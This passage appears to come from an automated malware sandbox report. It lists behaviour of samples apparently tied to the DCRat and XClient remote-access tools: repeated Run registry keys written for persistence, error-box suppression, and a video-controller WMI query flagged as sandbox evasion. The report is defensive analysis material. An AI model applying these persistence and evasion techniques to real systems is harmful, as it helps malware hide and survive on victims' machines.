                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
